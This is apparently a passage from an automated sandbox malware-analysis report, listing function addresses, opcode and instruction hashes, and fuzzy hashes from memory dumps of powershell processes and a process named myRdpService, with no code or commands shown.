                                                                                                                            • Source File: 00000015.00000002.3704278180.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 122cfbe62ac6e244a3b5faa58d26f8c326a56e699132f709c9197ef3c06a87ad
                                                                                                                            • Instruction ID: 4e592d820025be6099e197ec5925e973c620b6982ce2ca843a1238bd2517451a
                                                                                                                            • Opcode Fuzzy Hash: 122cfbe62ac6e244a3b5faa58d26f8c326a56e699132f709c9197ef3c06a87ad
                                                                                                                            • Instruction Fuzzy Hash: 6A312D3191969E9EFBB89F18CC0ABF937A0FF45319F405139D44D86192CB386A86CB71
                                                                                                                            Function 00007FFCCF2033B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.3704278180.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a0624f86ebd9528cec7ec0f06e3207042afc215c6a5550060f6eb874b6865086
                                                                                                                            • Instruction ID: 0dc144ab597cb3465dbc96f80447d648bc1b3dd0391e86454801b576ed999e85
                                                                                                                            • Opcode Fuzzy Hash: a0624f86ebd9528cec7ec0f06e3207042afc215c6a5550060f6eb874b6865086
                                                                                                                            • Instruction Fuzzy Hash: 5401677111CB0C4FD744EF0CE491AA5B7E0FB95324F50056EE58AC3651DA36E882CB45

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFCCF200625 Relevance: 10.2, Strings: 8, Instructions: 159COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.3704278180.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (0G,$8,G,$H1G,$P/G,$]$p0G,$-G,$/G,
                                                                                                                            • API String ID: 0-1862987814
                                                                                                                            • Opcode ID: 304daaed6aca943895620ab05acf72b634382660b4b17ebcfd443d1560f6f4fa
                                                                                                                            • Instruction ID: 49ed824e9b6d939dd82669a57849073d4e7007fc802d8459017b0b8729b3866a
                                                                                                                            • Opcode Fuzzy Hash: 304daaed6aca943895620ab05acf72b634382660b4b17ebcfd443d1560f6f4fa
                                                                                                                            • Instruction Fuzzy Hash: 6951C4A3C0E9D90FF765CBA81859165EF91EF92750B1810FFE0DC464E78849A94BC372
                                                                                                                            Function 00007FFCCF2006A5 Relevance: 10.1, Strings: 8, Instructions: 124COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.3704278180.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (0G,$8,G,$H1G,$P/G,$]$p0G,$-G,$/G,
                                                                                                                            • API String ID: 0-1862987814
                                                                                                                            • Opcode ID: d526b19da1ff393b08e79f753beae4323fe008c85a9cb4c59efc95d41a30476c
                                                                                                                            • Instruction ID: 9f16588a72757291712531b70756b5b378d08e3a3fd83d1c5a11fd3d3f02ad24
                                                                                                                            • Opcode Fuzzy Hash: d526b19da1ff393b08e79f753beae4323fe008c85a9cb4c59efc95d41a30476c
                                                                                                                            • Instruction Fuzzy Hash: F441C3A384EAC50FF751CAA81858166EFA1EF52700B1810FFE0DC465EB8448AD4BC773

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFCCF2085FC Relevance: 1.6, Strings: 1, Instructions: 390COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 0-2766056989
                                                                                                                            • Opcode ID: d1bb5b9fa0ec45705c0463648e72d28c007cd6da31cd1a5f048a5a1d935d7e4f
                                                                                                                            • Instruction ID: a6935ec8b8e9cc1705f0196435a9bec9ee9d61281a14926d89eedae6d375ed74
                                                                                                                            • Opcode Fuzzy Hash: d1bb5b9fa0ec45705c0463648e72d28c007cd6da31cd1a5f048a5a1d935d7e4f
                                                                                                                            • Instruction Fuzzy Hash: A9D1F73290D6DE4FEB55DB288855AEA7BE1EF56310F0402BDD489871D7DE28A807C3B1
                                                                                                                            Function 00007FFCCF207136 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: r6*,
                                                                                                                            • API String ID: 0-2636615394
                                                                                                                            • Opcode ID: d3a438d1938f2e4688e2d22a7e70caad6ed15ccec90845efe4ecda528179f5fe
                                                                                                                            • Instruction ID: 481923cd5b270f6c5223239932b74a5714cbf36a79241cedd9ff8f5771a11aef
                                                                                                                            • Opcode Fuzzy Hash: d3a438d1938f2e4688e2d22a7e70caad6ed15ccec90845efe4ecda528179f5fe
                                                                                                                            • Instruction Fuzzy Hash: 62716232F1899E4BEF58EB384465AB9BBE5EF94300F105579D44EC7682DD28A842C7A0
                                                                                                                            Function 00007FFCCF20B029 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: r6*,
                                                                                                                            • API String ID: 0-2636615394
                                                                                                                            • Opcode ID: 3184b924f361da87d251b29503d1ab40feac3fee1efea41106a545d08dba71c5
                                                                                                                            • Instruction ID: 90fb1f7c82ba8c4be94feeec9cacb4d91f09170d63ad17bcb098038309db7e91
                                                                                                                            • Opcode Fuzzy Hash: 3184b924f361da87d251b29503d1ab40feac3fee1efea41106a545d08dba71c5
                                                                                                                            • Instruction Fuzzy Hash: 2C31B131A0C7C98FD790DF7884586AAFBE1EF99314F100A7AE088C3252DB64D881C752
                                                                                                                            Function 00007FFCCF20B040 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: r6*,
                                                                                                                            • API String ID: 0-2636615394
                                                                                                                            • Opcode ID: 0f1a7c719d36c58659761df747d522560985a52818a264aed9fb5e684ea79b57
                                                                                                                            • Instruction ID: 9d1bc1611122559bbe919ff3dcf29df4a6d46e6f369986a332511898197d59e8
                                                                                                                            • Opcode Fuzzy Hash: 0f1a7c719d36c58659761df747d522560985a52818a264aed9fb5e684ea79b57
                                                                                                                            • Instruction Fuzzy Hash: AE11E931A0869D8FD760EF38C888966F7E2EB98350F105B3AD049C3261DE74E881C791
                                                                                                                            Function 00007FFCCF207140 Relevance: 1.3, Strings: 1, Instructions: 7COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: r6*,
                                                                                                                            • API String ID: 0-2636615394
                                                                                                                            • Opcode ID: 00b950ad550194eefe951a2a3d73f1e6b0c61d8097b98134fb45abcbe2349b33
                                                                                                                            • Instruction ID: 5385545003a66a58d48281c1fe5d5ef5f8ee8c13055f6a706141240c5c9df29e
                                                                                                                            • Opcode Fuzzy Hash: 00b950ad550194eefe951a2a3d73f1e6b0c61d8097b98134fb45abcbe2349b33
                                                                                                                            • Instruction Fuzzy Hash: 9DB0128380E7C20FF6564E2818101625EA05B3A30031970F7D0844B1DBD804AF46C376
                                                                                                                            Function 00007FFCCF207DCE Relevance: .2, Instructions: 207COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9794aae519a1eba1d677ad74be9b5e232258eed3b0500bf295e57a31d48448df
                                                                                                                            • Instruction ID: 42870688b22bad3dd008296010b6bff46d9d03b0b9e8a27243b5edebe15db196
                                                                                                                            • Opcode Fuzzy Hash: 9794aae519a1eba1d677ad74be9b5e232258eed3b0500bf295e57a31d48448df
                                                                                                                            • Instruction Fuzzy Hash: B7619131908A5C8FDB69DF58D8557E9B7F0FF68310F0042AAD04DE3251DA74A986CB91
                                                                                                                            Function 00007FFCCF20AC32 Relevance: .2, Instructions: 155COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d7ef23998cbfee18205b6fcb6b459ec18762f161bc704f7e32ed3c69b6f59b46
                                                                                                                            • Instruction ID: a04933ba7405bf5c95f1618db5d893573d8d4ec36b87c26232f9e3f67501c2c7
                                                                                                                            • Opcode Fuzzy Hash: d7ef23998cbfee18205b6fcb6b459ec18762f161bc704f7e32ed3c69b6f59b46
                                                                                                                            • Instruction Fuzzy Hash: 28416532B1895D4BDB59EB28C855AF9B3E1EF98310F40417AD01ED3682DE34B946CBA0
                                                                                                                            Function 00007FFCCF207ED0 Relevance: .1, Instructions: 148COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ed624f09b6b4ec1c23e6f03e1033c06b9fe188d0592afa626ba1d0b294e6c9ce
                                                                                                                            • Instruction ID: b48b7467ce169f2624d2a36be34a6d8cdb6dbb153478f21384d9f8577c93010e
                                                                                                                            • Opcode Fuzzy Hash: ed624f09b6b4ec1c23e6f03e1033c06b9fe188d0592afa626ba1d0b294e6c9ce
                                                                                                                            • Instruction Fuzzy Hash: E541AA32908A5D8FEF64DF58D8447F9BBF0FF58310F004269D44DA3551DA746946CBA1
                                                                                                                            Function 00007FFCCF207EEF Relevance: .1, Instructions: 127COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e953abaeea150e3d8091a05195a58c4ba1e1dfcbed5f3799ac902b6a4724380e
                                                                                                                            • Instruction ID: 029c2166a31b8a91fb2fde8943e472e0d47d067ef302a35b64f2c71bb9872290
                                                                                                                            • Opcode Fuzzy Hash: e953abaeea150e3d8091a05195a58c4ba1e1dfcbed5f3799ac902b6a4724380e
                                                                                                                            • Instruction Fuzzy Hash: BE414231908A5C8FDF58DF48D885BE9B7B1FF68310F008299D04EA7255DE70AA85CF85
                                                                                                                            Function 00007FFCCF206700 Relevance: .1, Instructions: 62COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6b2b76fe604ee3bb234fc5a95df338f7e595b7163ae37e8f098a3f980e9e6108
                                                                                                                            • Instruction ID: 5976e81c4b48fb23a899daaa0d4111a1980b6b397e23f4bb67bb937487b626ea
                                                                                                                            • Opcode Fuzzy Hash: 6b2b76fe604ee3bb234fc5a95df338f7e595b7163ae37e8f098a3f980e9e6108
                                                                                                                            • Instruction Fuzzy Hash: A211213190855E4BEB68EB74C865ABEBAF1EF55310F10123DE08B935D2DE246852C7B1
                                                                                                                            Function 00007FFCCF206F62 Relevance: .0, Instructions: 50COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4d3810b7046f57ea6d351f22443bb1c80a920ffd95f72439770fb6b03afd1afd
                                                                                                                            • Instruction ID: 0555620f7694f3c17896429a18e853011e960d6984095325bb93cdc6a1e32f4a
                                                                                                                            • Opcode Fuzzy Hash: 4d3810b7046f57ea6d351f22443bb1c80a920ffd95f72439770fb6b03afd1afd
                                                                                                                            • Instruction Fuzzy Hash: 38F02822B0EA1E0FE245B728E8661F9B7B0DF91330B1426BBD049C7196DD1A6443C391
                                                                                                                            Function 00007FFCCF2033B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 119a618ceb0c40f4b36265f9a40471ac691ed19a381b2d294f2dbad52edef289
                                                                                                                            • Instruction ID: 0dc144ab597cb3465dbc96f80447d648bc1b3dd0391e86454801b576ed999e85
                                                                                                                            • Opcode Fuzzy Hash: 119a618ceb0c40f4b36265f9a40471ac691ed19a381b2d294f2dbad52edef289
                                                                                                                            • Instruction Fuzzy Hash: 5401677111CB0C4FD744EF0CE491AA5B7E0FB95324F50056EE58AC3651DA36E882CB45
                                                                                                                            Function 00007FFCCF206F81 Relevance: .0, Instructions: 47COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 19eb7df35e7a5fc22a3bd76f1d0e2db277d6045cfcbddf7cd86a8bf2d3766c35
                                                                                                                            • Instruction ID: 9f26401a1d195cc1175a21d1fadce656c0c080ffa8edce3cb701330a738acd09
                                                                                                                            • Opcode Fuzzy Hash: 19eb7df35e7a5fc22a3bd76f1d0e2db277d6045cfcbddf7cd86a8bf2d3766c35
                                                                                                                            • Instruction Fuzzy Hash: 7401FC6190DB894FD366EB3888651A1BFF0DF5521070446FFC089C75A3DD145887C3A2
                                                                                                                            Function 00007FFCCF206FA0 Relevance: .0, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 90a917a1d110a244f57f008f3a9e2bbd37d8b4d021218b99737c86f888f9aa54
                                                                                                                            • Instruction ID: fb5e5969c59b2ac15fbbdbb0f888be17c39d998ba84fde2e67d2cc8c0cb544f8
                                                                                                                            • Opcode Fuzzy Hash: 90a917a1d110a244f57f008f3a9e2bbd37d8b4d021218b99737c86f888f9aa54
                                                                                                                            • Instruction Fuzzy Hash: A7F08931E08E1D4FD368FF3884555A6B6F1EF98310710567AD05DC31A5DE246946C791

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFCCF2006B0 Relevance: 10.1, Strings: 8, Instructions: 104COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000019.00000002.3700512556.00007FFCCF200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF200000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_25_2_7ffccf200000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (0G,$8,G,$H1G,$P/G,$]$p0G,$-G,$/G,
                                                                                                                            • API String ID: 0-1862987814
                                                                                                                            • Opcode ID: 43adcef7356bbbacf0af2aa77907b55f86edb525a09dab842f92ebaca3b7f41c
                                                                                                                            • Instruction ID: 3e1b23ef3fb8af88c8718145520b6e9b0b7b96e7543c6ab186bb7baa787ede7c
                                                                                                                            • Opcode Fuzzy Hash: 43adcef7356bbbacf0af2aa77907b55f86edb525a09dab842f92ebaca3b7f41c
                                                                                                                            • Instruction Fuzzy Hash: A131D0A384F9C50FF755CAA82844566EFA1AB92700B1810FFE0DC875EB8448ED4BC376

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FF6B871DB00 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002A.00000002.4143316225.00007FF6B8661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF6B8660000, based on PE: true
                                                                                                                            • Associated: 0000002A.00000002.4143254300.00007FF6B8660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.4144371245.00007FF6B8B66000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.4144771419.00007FF6B8D28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.4144771419.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.4145600920.00007FF6B90C0000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.4145647535.00007FF6B90C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.4145647535.00007FF6B90E0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.4145647535.00007FF6B90E3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.4145647535.00007FF6B90E5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000002A.00000002.4145831001.00007FF6B90E8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_42_2_7ff6b8660000_myRdpService.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            • Opcode ID: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
                                                                                                                            • Instruction ID: 9687f90712a6c0636c417c59923ce3f3fdfee5c69863e9de8fae116796aa8a56
                                                                                                                            • Opcode Fuzzy Hash: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
                                                                                                                            • Instruction Fuzzy Hash: E3111822B18F018AEB009F74E8542B833A4FB59758F441A35EB6D877A4DF7CD1A98354

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFCCF2133B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002B.00000002.4135164497.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_43_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b08e800cc9064759caf8a4c861b29adf5695cf285c6017511a9509b8148377c3
                                                                                                                            • Instruction ID: db5e90628ac7b1bc4d06b6c6644ee06e45f5856afc0efeffa01926ee9775e47a
                                                                                                                            • Opcode Fuzzy Hash: b08e800cc9064759caf8a4c861b29adf5695cf285c6017511a9509b8148377c3
                                                                                                                            • Instruction Fuzzy Hash: 8801677111CB0C4FDB44EF0CE451AA5B7E0FB95324F50056EE58AC3651DA36E882CB45

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFCCF210550 Relevance: 8.9, Strings: 7, Instructions: 116COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002B.00000002.4135164497.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_43_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (0G,$8,G,$H1G,$P/G,$p0G,$-G,$/G,
                                                                                                                            • API String ID: 0-4065064326
                                                                                                                            • Opcode ID: 6b3dd94626a97ab9a8a020dc5be2b387bfbce046ccb6c58575fd515fb9109e30
                                                                                                                            • Instruction ID: 6b966957524cd2d1646903033a346089df9632352e280ad0150371293c161366
                                                                                                                            • Opcode Fuzzy Hash: 6b3dd94626a97ab9a8a020dc5be2b387bfbce046ccb6c58575fd515fb9109e30
                                                                                                                            • Instruction Fuzzy Hash: 3631068384F9D91FF715CFA828581B6EBA1BF5271071C90BBE49C860DB9805EC49D37A